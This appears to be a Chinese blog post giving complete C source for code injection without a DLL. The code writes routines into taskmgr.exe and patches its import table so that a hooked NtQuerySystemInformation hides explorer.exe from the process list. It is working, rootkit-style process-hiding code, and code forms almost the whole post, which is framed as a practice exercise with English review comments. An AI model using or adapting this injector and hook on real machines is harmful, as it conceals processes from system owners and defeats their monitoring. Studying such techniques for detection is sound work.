代码注入 API HOOK(非DLL)
使用代码注入来实现进程隐藏 而不是使用DLL注入来实现进程隐藏
没有什么高级技术 纯体力活 原理就不说了 只是没有通过DLL注入 来实现HOOK API
没有什么高级技术 纯体力活 原理就不说了 只是没有通过DLL注入 来实现HOOK API
从核心编程 以来 似乎 一提到C注入 就是DLL注入 很奇怪 为什么没人写个完整的代码注入
所以 自己动手写了下
纯粹注入代码 邪恶二进制上 也有个代码注入的 只是用了一个未公开的函数,我还看不懂
= =本来想用汇编写的 发现汇编注入代码远比C注入代码来的繁 所以用C实现了
纯粹注入代码 邪恶二进制上 也有个代码注入的 只是用了一个未公开的函数,我还看不懂
= =本来想用汇编写的 发现汇编注入代码远比C注入代码来的繁 所以用C实现了
主要功能就是隐藏进程。不过这是 RING3(用户态)的 IAT HOOK:只对被注入的那一个进程(这里是 taskmgr.exe)生效,任何未被注入的工具仍然能看到被隐藏的进程,而且只要检查 taskmgr.exe 的 IAT 就能发现挂钩,所以实际用处不大,练习而已。
代码如下:后记:第一次没有照着书 打代码 也找不到C 注入代码的例子 能找到的都是DLL注入原理早就知道了 真的写一遍 不容易 整个编写的过程 碰到了很多问题 最终都解决了 轻松了
代码如下:
//需要编译成 Release 版本:Debug 版本(增量链接)下取函数地址得到的是跳转表(ILT)里的桩,
//拷贝到远程进程的只是一条 jmp xxxxx,而 xxxxx 在目标进程里是无效地址(相当于引用了一个全局变量),
//程序必然崩溃。另外代码用 DWORD 存放指针并通过 fs:[0x30] 读 PEB,只适用于 32 位进程。
- #include "Iat_Hook.h"
/* Target process whose IAT gets patched: main() hands this to GetProcessPid().
 * Because the hook lives in this one process's import table, only this process
 * stops seeing the hidden entry - every other tool on the box still does. */
char cPath[] = "taskmgr.exe";
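void main(void)
{
    /* Injector entry point.
     *   1. find the target pid and open it;
     *   2. allocate three regions in the target: the replacement
     *      NtQuerySystemInformation (stays forever - the patched IAT slot
     *      points into it), the REMOTESTRUCT parameter block (stays forever -
     *      the hook reads the process name out of it), and the one-shot
     *      installer thread body (released once the thread has finished);
     *   3. copy the bytes over and start RemoteThread in the target.
     * Every API result is checked and remote memory is released on failure;
     * the original checked only OpenProcess and leaked the thread handle. */
    DWORD dwPid;
    HANDLE hProcess = NULL;
    HANDLE hThread = NULL;
    /* Upper bound on the byte size of each injected routine. C cannot measure
     * a function, so a fixed slice starting at its address is copied; it must
     * exceed the compiled size of RemoteThread / myNtQuerySystemInformation
     * (and reading past the end of .text could fault if a routine sits last). */
    DWORD dwSize = 2048;
    /* How long to wait for the installer thread before giving up on it. */
    const DWORD dwInstallTimeoutMs = 5000;
    PVOID pRemoteAddress = NULL, pRemoteStructAddress = NULL, MyAddress = NULL;
    REMOTESTRUCT stRemoteStruct;

    /* GetProcessPid() reports "not found" as 0 and already prints why. */
    dwPid = GetProcessPid(cPath);
    if (dwPid == 0)
        return;

    hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid);
    if (hProcess == NULL)
    {
        printf("open error code %lu\n", GetLastError());
        return;
    }

    /* Replacement function: code, so it needs execute permission. */
    MyAddress = VirtualAllocEx(hProcess, NULL, dwSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    /* Parameter block: data only - no reason to map it executable. */
    pRemoteStructAddress = VirtualAllocEx(hProcess, NULL, sizeof(REMOTESTRUCT), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    /* Installer thread body. */
    pRemoteAddress = VirtualAllocEx(hProcess, NULL, dwSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (MyAddress == NULL || pRemoteStructAddress == NULL || pRemoteAddress == NULL)
    {
        printf("VirtualAllocEx error code %lu\n", GetLastError());
        goto cleanup;
    }

    /* The struct needs the remote address of the replacement, so fill it only
     * after that allocation succeeded. */
    InitializeStruct(&stRemoteStruct, (DWORD)MyAddress, dwPid);

    if (!WriteProcessMemory(hProcess, MyAddress, (LPCVOID)myNtQuerySystemInformation, dwSize, NULL) ||
        !WriteProcessMemory(hProcess, pRemoteStructAddress, &stRemoteStruct, sizeof(REMOTESTRUCT), NULL) ||
        !WriteProcessMemory(hProcess, pRemoteAddress, (LPCVOID)RemoteThread, dwSize, NULL))
    {
        printf("WriteProcessMemory error code %lu\n", GetLastError());
        goto cleanup;
    }

    hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pRemoteAddress,
                                 pRemoteStructAddress, 0, NULL);
    if (hThread == NULL)
    {
        printf("CreateRemoteThread error code %lu\n", GetLastError());
        goto cleanup;
    }

    /* Wait for the installer so its code page can be released. If it has not
     * returned within the timeout, leave the page mapped rather than free code
     * that may still be executing. The other two regions must stay mapped. */
    if (WaitForSingleObject(hThread, dwInstallTimeoutMs) == WAIT_OBJECT_0)
        VirtualFreeEx(hProcess, pRemoteAddress, 0, MEM_RELEASE);
    CloseHandle(hThread);
    CloseHandle(hProcess);
    return;

cleanup:
    /* Installation did not happen: give the target its memory back. */
    if (MyAddress != NULL)
        VirtualFreeEx(hProcess, MyAddress, 0, MEM_RELEASE);
    if (pRemoteStructAddress != NULL)
        VirtualFreeEx(hProcess, pRemoteStructAddress, 0, MEM_RELEASE);
    if (pRemoteAddress != NULL)
        VirtualFreeEx(hProcess, pRemoteAddress, 0, MEM_RELEASE);
    CloseHandle(hProcess);
}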
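DWORD __stdcall RemoteThread(PREMOTESTRUCT pRemoteStruct)
{
    /* Installer thread. main() copies this routine byte-wise into the target
     * and starts it there with the remote copy of REMOTESTRUCT as argument.
     * It therefore may only reach the outside world through the function
     * pointers carried in *pRemoteStruct: no string literals, no CRT or
     * import calls, no aggregate initialisers (the compiler could lower them
     * to memset), no switch (jump tables). 32-bit only - pointers travel as
     * DWORD.
     *
     * Steps:
     *   1. main module base of the target = hMods[0] from EnumProcessModules;
     *   2. park the real NtQuerySystemInformation, the wide compare routine
     *      and a pointer to the name to hide in kernel32's DOS header at
     *      +4, +8 and +0x14 - the only "global" storage the replacement
     *      function can find again (it locates kernel32 via the PEB);
     *   3. walk the main module's import descriptors to ntdll.dll and point
     *      the IAT slot that holds NtQuerySystemInformation at dwMyAddress.
     *
     * Returns 1 once the IAT slot was patched, 0 on any failure (main() does
     * not consume the exit code, so this is informational only).
     *
     * NOTE(review): hProcess is never closed - REMOTESTRUCT carries no
     * CloseHandle pointer, so the target keeps one extra handle to itself.
     * The DOS-header fields clobbered in step 2 are presumably unused once
     * the image is mapped, but any code that later parses kernel32's header
     * in this process (e.g. another PE walker) will read garbage there. */
    FARPROC fpVirtualQuery;
    FARPROC fpVirtualProtect;
    FARPROC fpOpenProcess;
    FARPROC fpEnum;
    FARPROC fpGetProcAddress;
    FARPROC fpLoadLibrary;
    FARPROC fpFreeLibrary;
    FARPROC fpWriteMemory;
    FARPROC fplstrcmp;
    HANDLE hProcess;
    HMODULE hMods[256];
    DWORD dwNeed;
    HANDLE hPsapi;
    BOOL bEnum;
    MEMORY_BASIC_INFORMATION stMem;
    HMODULE hKernel, hModule;
    PIMAGE_DOS_HEADER pDosHeader;
    PIMAGE_NT_HEADERS pNtHeaders;
    IMAGE_DATA_DIRECTORY ImageImport;
    PIMAGE_IMPORT_DESCRIPTOR pImportDesc;
    PIMAGE_THUNK_DATA pThunk;
    DWORD oldProtect;
    DWORD dummyProtect;
    wchar_t *p = pRemoteStruct->cProcessName;   /* remote address of the name to hide */

    fpVirtualQuery   = (FARPROC)pRemoteStruct->dwVirtualQuery;
    fpVirtualProtect = (FARPROC)pRemoteStruct->dwVirtualProtect;
    fpOpenProcess    = (FARPROC)pRemoteStruct->dwOpenProcess;
    fpLoadLibrary    = (FARPROC)pRemoteStruct->dwLoadLibrary;
    fpFreeLibrary    = (FARPROC)pRemoteStruct->dwFreeLibrary;
    fpGetProcAddress = (FARPROC)pRemoteStruct->dwGetProcAddress;
    fpWriteMemory    = (FARPROC)pRemoteStruct->dwWriteProcessMemory;
    fplstrcmp        = (FARPROC)pRemoteStruct->dwlstrcmp;

    /* A handle to ourselves, needed by EnumProcessModules / WriteProcessMemory. */
    hProcess = (HANDLE)fpOpenProcess(PROCESS_ALL_ACCESS, FALSE, pRemoteStruct->dwPid);
    if (!hProcess)
        return 0;

    /* Step 1: the first module returned is the main executable. The original
     * ignored the EnumProcessModules result and used hMods[0] uninitialised
     * on failure. */
    hPsapi = (HANDLE)fpLoadLibrary(pRemoteStruct->cDllName);
    if (!hPsapi)
        return 0;
    fpEnum = (FARPROC)fpGetProcAddress(hPsapi, pRemoteStruct->cFunName);
    bEnum = FALSE;
    dwNeed = 0;
    if (fpEnum)
        bEnum = (BOOL)fpEnum(hProcess, hMods, sizeof(hMods), &dwNeed);
    fpFreeLibrary(hPsapi);
    if (!bEnum || dwNeed < sizeof(HMODULE))
        return 0;
    hModule = hMods[0];

    /* Step 2: stash the values the replacement function will need. */
    hKernel = (HANDLE)fpLoadLibrary(pRemoteStruct->cKernel);
    if (!hKernel)
        return 0;
    if (!fpVirtualQuery(hKernel, &stMem, sizeof(MEMORY_BASIC_INFORMATION)))
        return 0;
    if (!fpVirtualProtect(stMem.BaseAddress, stMem.RegionSize, PAGE_READWRITE, &oldProtect))
        return 0;
    fpWriteMemory(hProcess, (PBYTE)(hKernel) + 4, &pRemoteStruct->dwNtQuerySystem, sizeof(DWORD), NULL);
    fpWriteMemory(hProcess, (PBYTE)(hKernel) + 8, &pRemoteStruct->dwlstrcmpW, sizeof(DWORD), NULL);
    fpWriteMemory(hProcess, (PBYTE)(hKernel) + 0x14, &p, sizeof(DWORD), NULL);
    fpVirtualProtect(stMem.BaseAddress, stMem.RegionSize, oldProtect, &dummyProtect);

    /* Step 3: locate the import directory. e_lfanew is a LONG at 0x3C; the
     * original read only its low byte, which silently breaks for any image
     * whose PE header starts at or beyond 0x100. Signatures are checked so
     * a bad base cannot turn into a wild pointer walk. */
    pDosHeader = (PIMAGE_DOS_HEADER)hModule;
    if (pDosHeader->e_magic != IMAGE_DOS_SIGNATURE)
        return 0;
    pNtHeaders = (PIMAGE_NT_HEADERS)((PBYTE)hModule + pDosHeader->e_lfanew);
    if (pNtHeaders->Signature != IMAGE_NT_SIGNATURE)
        return 0;
    ImageImport = pNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT];
    if (ImageImport.VirtualAddress == 0)
        return 0;

    /* Find the descriptor for ntdll.dll (compared with whatever routine
     * InitializeStruct put in dwlstrcmp). */
    pImportDesc = (PIMAGE_IMPORT_DESCRIPTOR)((PBYTE)hModule + ImageImport.VirtualAddress);
    while (pImportDesc->Name)
    {
        if (0 == fplstrcmp(pRemoteStruct->cNtdll, (PSTR)((PBYTE)hModule + pImportDesc->Name)))
            break;
        pImportDesc++;
    }
    if (!pImportDesc->Name)
        return 0;   /* target does not import ntdll directly - nothing to patch
                     * (the original fell through and walked FirstThunk of the
                     * terminating descriptor) */

    /* Patch the one IAT slot that currently holds the real address. Protection
     * is restored only if it was actually changed. */
    pThunk = (PIMAGE_THUNK_DATA)((PBYTE)hModule + pImportDesc->FirstThunk);
    while (pThunk->u1.Function)
    {
        if (pThunk->u1.Function == pRemoteStruct->dwNtQuerySystem)
        {
            if (!fpVirtualQuery(&pThunk->u1.Function, &stMem, sizeof(MEMORY_BASIC_INFORMATION)))
                return 0;
            if (!fpVirtualProtect(stMem.BaseAddress, stMem.RegionSize, PAGE_READWRITE, &oldProtect))
                return 0;
            pThunk->u1.Function = pRemoteStruct->dwMyAddress;
            fpVirtualProtect(stMem.BaseAddress, stMem.RegionSize, oldProtect, &dummyProtect);
            return 1;
        }
        pThunk++;
    }
    return 0;   /* slot not found (IAT not yet bound, or imported by ordinal/forwarder) */
}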
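NTSTATUS WINAPI myNtQuerySystemInformation (
    SYSTEM_INFORMATION_CLASS SystemInformationClass,
    PVOID SystemInformation,
    ULONG SystemInformationLength,
    PULONG ReturnLength)
{
    /* Replacement the patched IAT slot points at. Runs inside the target, so
     * the same rules as RemoteThread apply (no literals, no imports, no CRT).
     * It finds its collaborators through the values RemoteThread stored in
     * kernel32's DOS header: +4 the real NtQuerySystemInformation, +8 the
     * wide string compare, +0x14 a pointer to the wide name to hide.
     *
     * Every call is forwarded to the original. For
     * SystemProcessesAndThreadsInformation the returned list is then edited
     * in place: each entry whose ProcessName matches is unlinked by folding
     * its NextEntryDelta into its predecessor's (delta 0 marks the last
     * entry). ReturnLength is left as the kernel reported it.
     *
     * Fixes over the original: the buffer is only touched when the real call
     * succeeded; the last entry is examined too (the old loop stopped one
     * short, so a match in last position stayed visible); an unlinked entry
     * no longer becomes the predecessor, so two adjacent matches both vanish;
     * the original was called through a correctly typed pointer. */
    HANDLE hKernel;
    NTSTATUS ntStatus;
    wchar_t *pName;
    PSYSTEM_PROCESS_INFORMATION pCurrent, pPrev;
    FARPROC fpNtQuerySystem;
    FARPROC fplstrcmpW;
    BOOL bHide;

    /* kernel32 base through the PEB loader data: fs:[0x30] = PEB, +0xC = Ldr,
     * +0x1C = InInitializationOrderModuleList; the DllBase (+8 from the link)
     * of the second entry is taken to be kernel32. x86 only.
     * NOTE(review): this ordering (ntdll, then kernel32) holds on XP/2003;
     * on Win7+ kernelbase.dll is initialised before kernel32, so the second
     * entry is the wrong module - confirm before running on anything newer. */
    _asm
    {
        mov eax,fs:[0x30]
        mov eax,[eax+0xc]
        mov ecx,[eax+0x1c]
        mov ecx, [ecx]
        mov eax, [ecx+8]
        mov hKernel,eax
    }
    fpNtQuerySystem = *(FARPROC *)((DWORD)hKernel + 4);
    fplstrcmpW = *(FARPROC *)((DWORD)hKernel + 8);
    pName = *(wchar_t **)((DWORD)hKernel + 0x14);

    /* Cast the pointer, then call. The original cast the *result* of an
     * untyped FARPROC call to a function-pointer type and stored that in an
     * int - same bits on x86, but not what it meant. */
    ntStatus = ((NTQUERYSYSTEMINFORMATION)fpNtQuerySystem)(SystemInformationClass,
                   SystemInformation, SystemInformationLength, ReturnLength);

    /* NTSTATUS is signed here (typedef int); anything < 0 is a failure such
     * as STATUS_INFO_LENGTH_MISMATCH, after which the buffer is undefined. */
    if (ntStatus < 0 || SystemInformation == NULL ||
        SystemInformationClass != SystemProcessesAndThreadsInformation)
        return ntStatus;

    pPrev = NULL;
    pCurrent = (PSYSTEM_PROCESS_INFORMATION)SystemInformation;
    for (;;)
    {
        /* Buffer is NULL for the idle process. The compare assumes Buffer is
         * NUL-terminated, which UNICODE_STRING does not guarantee in general
         * - TODO confirm for this information class. Case sensitivity is
         * whatever routine InitializeStruct stored in dwlstrcmpW. */
        bHide = pCurrent->ProcessName.Buffer != NULL &&
                0 == fplstrcmpW(pCurrent->ProcessName.Buffer, pName);

        if (bHide && pPrev != NULL)
        {
            if (pCurrent->NextEntryDelta)
                pPrev->NextEntryDelta += pCurrent->NextEntryDelta; /* skip over us */
            else
                pPrev->NextEntryDelta = 0;                         /* we were last */
        }
        /* NOTE(review): a match at the head of the list is left visible.
         * Hiding it would mean shifting the rest of the buffer down; the
         * original assigned the by-value SystemInformation parameter here,
         * which never reached the caller and so did nothing. */

        if (pCurrent->NextEntryDelta == 0)
            break;                     /* last entry has now been examined */
        if (!bHide || pPrev == NULL)
            pPrev = pCurrent;          /* an unlinked entry must not become the predecessor */
        pCurrent = (PSYSTEM_PROCESS_INFORMATION)((PBYTE)pCurrent + pCurrent->NextEntryDelta);
    }
    return ntStatus;
}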
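/* Look up a process id by executable name. */
DWORD GetProcessPid(char *cPath)
{
    /* Returns the pid of the first running process whose executable name
     * equals cPath, compared case-insensitively because Windows file names
     * are not case-sensitive ("Taskmgr.exe" would otherwise be missed).
     * Returns 0 when cPath is empty, the snapshot fails, or nothing matches;
     * 0 is a safe sentinel since OpenProcess() rejects it.
     *
     * Fixes over the original: the final check compared against a hard-coded
     * "taskmgr.exe" rather than cPath, the snapshot handle leaked on both
     * failure paths, and the messages used "/n" instead of a newline. */
    PROCESSENTRY32 stProcess;
    HANDLE hSnap;
    DWORD dwPid = 0;

    if (cPath == NULL || cPath[0] == '\0')
        return 0;

    hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hSnap == INVALID_HANDLE_VALUE)
    {
        printf("CreateToolhelp32Snapshot error code %lu\n", GetLastError());
        return 0;
    }

    stProcess.dwSize = sizeof(PROCESSENTRY32);   /* required before Process32First */
    if (!Process32First(hSnap, &stProcess))
    {
        printf("Process32First error code %lu\n", GetLastError());
        CloseHandle(hSnap);
        return 0;
    }
    do
    {
        if (lstrcmpiA(stProcess.szExeFile, cPath) == 0)
        {
            dwPid = stProcess.th32ProcessID;
            break;
        }
    } while (Process32Next(hSnap, &stProcess));
    CloseHandle(hSnap);

    if (dwPid == 0)
        printf("can not find process %s\n", cPath);
    return dwPid;
}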
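VOID InitializeStruct(PREMOTESTRUCT pRemoteStruct, DWORD MyAddress, DWORD dwPid)
{
    /* Fill the parameter block that main() copies verbatim into the target
     * (see REMOTESTRUCT). Addresses are resolved in *this* process and reused
     * in the target, which only works while ntdll/kernel32 sit at the same
     * base in both - true without ASLR, and in practice with per-boot ASLR
     * too; confirm on the target OS. There is no error return on this
     * interface: a lookup that fails leaves its field 0 and RemoteThread will
     * fault on the null pointer. */
    HMODULE hNtdll;
    HMODULE hKernel;

    /* Zero the whole block first so unused fields (dwMessageBox, dwEnum) and
     * padding do not carry injector stack bytes into the target. */
    memset(pRemoteStruct, 0, sizeof(*pRemoteStruct));

    /* Both DLLs are mapped in every Win32 process; Load/Free only moves the
     * refcount. GetProcAddress names are always ANSI, so use LoadLibraryA
     * explicitly instead of the TCHAR macro. */
    hNtdll = LoadLibraryA("ntdll.dll");
    if (hNtdll != NULL)
    {
        pRemoteStruct->dwNtQuerySystem = (DWORD)GetProcAddress(hNtdll, "NtQuerySystemInformation");
        FreeLibrary(hNtdll);
    }

    hKernel = LoadLibraryA("kernel32.dll");
    if (hKernel != NULL)
    {
        pRemoteStruct->dwVirtualProtect     = (DWORD)GetProcAddress(hKernel, "VirtualProtect");
        pRemoteStruct->dwVirtualQuery       = (DWORD)GetProcAddress(hKernel, "VirtualQuery");
        pRemoteStruct->dwOpenProcess        = (DWORD)GetProcAddress(hKernel, "OpenProcess");
        pRemoteStruct->dwGetProcAddress     = (DWORD)GetProcAddress(hKernel, "GetProcAddress");
        pRemoteStruct->dwFreeLibrary        = (DWORD)GetProcAddress(hKernel, "FreeLibrary");
        pRemoteStruct->dwLoadLibrary        = (DWORD)GetProcAddress(hKernel, "LoadLibraryA");
        pRemoteStruct->dwWriteProcessMemory = (DWORD)GetProcAddress(hKernel, "WriteProcessMemory");
        /* Case-insensitive compares: module and image names on Windows are
         * not case-sensitive, so the import walk must match "NTDLL.DLL" and
         * the hook must match "Explorer.EXE". Same signatures as
         * lstrcmpA/lstrcmpW, so RemoteThread and the hook need no change. */
        pRemoteStruct->dwlstrcmp  = (DWORD)GetProcAddress(hKernel, "lstrcmpiA");
        pRemoteStruct->dwlstrcmpW = (DWORD)GetProcAddress(hKernel, "lstrcmpiW");
        FreeLibrary(hKernel);
    }

    pRemoteStruct->dwMyAddress = MyAddress;   /* remote address of the replacement */
    pRemoteStruct->dwPid = dwPid;

    /* Bounded copies into the fixed-size fields; lstrcpyn always terminates. */
    lstrcpynA(pRemoteStruct->cDllName, "Psapi.dll", sizeof(pRemoteStruct->cDllName));
    lstrcpynA(pRemoteStruct->cFunName, "EnumProcessModules", sizeof(pRemoteStruct->cFunName));
    lstrcpynA(pRemoteStruct->cKernel, "Kernel32.dll", sizeof(pRemoteStruct->cKernel));
    lstrcpynA(pRemoteStruct->cNtdll, "ntdll.dll", sizeof(pRemoteStruct->cNtdll));
    /* Process to hide from the target. */
    lstrcpynW(pRemoteStruct->cProcessName, L"explorer.exe",
              sizeof(pRemoteStruct->cProcessName) / sizeof(pRemoteStruct->cProcessName[0]));
}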
- Iat_Hook.h
- //头文件
- #include <windows.h>
- #include <stdio.h>
- #include <stdlib.h>
- #include <string.h>
- #include <tlhelp32.h>
- #include <imagehlp.h>
- #include "Winternl.h"
- #pragma comment(lib, "imagehlp")
- //类型声明
/* Minimal NT definitions. NTSTATUS is signed: values < 0 are failures
 * (myNtQuerySystemInformation relies on this). */
typedef int NTSTATUS;
/* psapi!EnumProcessModules. Declared for completeness; the injected code
 * calls the resolved address through a FARPROC instead. */
typedef BOOL (__stdcall *ENUMPROCESSMODULES)(
HANDLE hProcess,
HMODULE* lphModule,
DWORD cb,
LPDWORD lpcbNeeded
);
/* ntdll!NtQuerySystemInformation - the function being hooked; the hook uses
 * this type to call the original. */
typedef NTSTATUS (WINAPI *NTQUERYSYSTEMINFORMATION)(
SYSTEM_INFORMATION_CLASS SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength
);
/* Parameter block for the injected code. main() copies it into the target
 * and passes the remote copy to RemoteThread as the thread argument. It has
 * to carry everything the injected routines need, because they cannot use
 * their own globals, string literals or imports once copied. All addresses
 * are stored as DWORD, so this is 32-bit only, and it assumes the system
 * DLLs are mapped at the same base in the injector and the target. */
typedef struct _REMOTE_STRUCT
{
DWORD dwNtQuerySystem;       /* ntdll!NtQuerySystemInformation: the IAT value to look for, and the original the hook forwards to */
DWORD dwVirtualQuery;        /* kernel32 entry points used by RemoteThread ... */
DWORD dwVirtualProtect;
DWORD dwOpenProcess;
DWORD dwMessageBox;          /* never written or read in this listing */
DWORD dwLoadLibrary;         /* LoadLibraryA */
DWORD dwGetProcAddress;
DWORD dwFreeLibrary;
DWORD dwWriteProcessMemory;
DWORD dwlstrcmp;             /* ANSI compare used to find the ntdll import descriptor */
DWORD dwlstrcmpW;            /* wide compare; RemoteThread parks it in kernel32's header for the hook */
DWORD dwEnum;                /* never written or read; EnumProcessModules is resolved at run time from cDllName/cFunName */
DWORD dwMyAddress;           /* remote address of the replacement NtQuerySystemInformation */
DWORD dwPid;                 /* target pid - RemoteThread re-opens its own process with it */
char cDllName[50];           /* "Psapi.dll" */
char cFunName[50];           /* "EnumProcessModules" */
char cKernel[50];            /* "Kernel32.dll" */
char cNtdll[50];             /* "ntdll.dll" - import descriptor name to match */
wchar_t cProcessName[50];    /* name of the process to hide; the hook keeps a pointer into this field, so the remote copy must stay mapped */
}REMOTESTRUCT, *PREMOTESTRUCT;
// Function declarations
/* Injector side (runs in this process): pid of the first process named cPath, 0 if none. */
DWORD GetProcessPid(char *cPath);
/* Injected side: copied byte-wise into the target and run there as a thread; installs the IAT hook. */
DWORD __stdcall RemoteThread(PREMOTESTRUCT pRemoteStruct);
/* Injector side: fills the REMOTESTRUCT that is shipped to the target. */
VOID InitializeStruct(PREMOTESTRUCT pRemoteStruct, DWORD MyAddress, DWORD dwPid);
/* Injected side: replacement installed in the target's IAT slot for NtQuerySystemInformation. */
NTSTATUS WINAPI myNtQuerySystemInformation (
SYSTEM_INFORMATION_CLASS SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength);
- Winternl.h
/* Counted wide string as used by the NT API.
 * NOTE(review): in the public NT definition Length/MaximumLength are byte
 * counts and Buffer is not guaranteed NUL-terminated; the hook nevertheless
 * passes Buffer to a C-string compare - confirm for this information class. */
typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer; // wide-character (Unicode) text
} UNICODE_STRING, *PUNICODE_STRING;
/* Information classes for NtQuerySystemInformation (XP-era list, unofficial
 * names). Only SystemProcessesAndThreadsInformation (value 5; the SDK calls
 * it SystemProcessInformation) is used by this listing. */
typedef enum _SYSTEM_INFORMATION_CLASS {
SystemBasicInformation,
SystemProcessorInformation,
SystemPerformanceInformation,
SystemTimeOfDayInformation,
SystemNotImplemented1,
SystemProcessesAndThreadsInformation,   /* = 5: the class the hook filters */
SystemCallCounts,
SystemConfigurationInformation,
SystemProcessorTimes,
SystemGlobalFlag,
SystemNotImplemented2,
SystemModuleInformation,
SystemLockInformation,
SystemNotImplemented3,
SystemNotImplemented4,
SystemNotImplemented5,
SystemHandleInformation,
SystemObjectInformation,
SystemPagefileInformation,
SystemInstructionEmulationCounts,
SystemInvalidInfoClass1,
SystemCacheInformation,
SystemPoolTagInformation,
SystemProcessorStatistics,
SystemDpcInformation,
SystemNotImplemented6,
SystemLoadImage,
SystemUnloadImage,
SystemTimeAdjustment,
SystemNotImplemented7,
SystemNotImplemented8,
SystemNotImplemented9,
SystemCrashDumpInformation,
SystemExceptionInformation,
SystemCrashDumpStateInformation,
SystemKernelDebuggerInformation,
SystemContextSwitchInformation,
SystemRegistryQuotaInformation,
SystemLoadAndCallImage,
SystemPrioritySeparation,
SystemNotImplemented10,
SystemNotImplemented11,
SystemInvalidInfoClass2,
SystemInvalidInfoClass3,
SystemTimeZoneInformation,
SystemLookasideInformation,
SystemSetTimeSlipEvent,
SystemCreateSession,
SystemDeleteSession,
SystemInvalidInfoClass4,
SystemRangeStartInformation,
SystemVerifierInformation,
SystemAddVerifier,
SystemSessionProcessesInformation
} SYSTEM_INFORMATION_CLASS;
/* One entry of the SystemProcessesAndThreadsInformation buffer, 32-bit layout.
 * Entries are chained by NextEntryDelta (byte offset to the next entry; 0 on
 * the last one - the hook relies on that to stop). The hook reads only
 * NextEntryDelta and ProcessName.
 * NOTE(review): these are unofficial field names; the SDK's
 * SYSTEM_PROCESS_INFORMATION calls them NextEntryOffset, NumberOfThreads,
 * ImageName and UniqueProcessId. Confirm the offsets against the OS the
 * target runs on before relying on anything beyond ProcessName. */
typedef struct _SYSTEM_PROCESS_INFORMATION
{
DWORD NextEntryDelta;          /* byte offset to the next entry, 0 = last */
DWORD dThreadCount;
DWORD dReserved01;
DWORD dReserved02;
DWORD dReserved03;
DWORD dReserved04;
DWORD dReserved05;
DWORD dReserved06;
FILETIME ftCreateTime; /* relative to 01-01-1601 */
FILETIME ftUserTime; /* 100 nsec units */
FILETIME ftKernelTime; /* 100 nsec units */
UNICODE_STRING ProcessName; // image (process) name - what the hook compares against
DWORD BasePriority;
DWORD dUniqueProcessId; // process id
DWORD dParentProcessID;
DWORD dHandleCount;
DWORD dReserved07;
DWORD dReserved08;
DWORD VmCounters;
DWORD dCommitCharge;
PVOID ThreadInfos[1];          /* placeholder for the per-thread records that follow */
} SYSTEM_PROCESS_INFORMATION, *PSYSTEM_PROCESS_INFORMATION;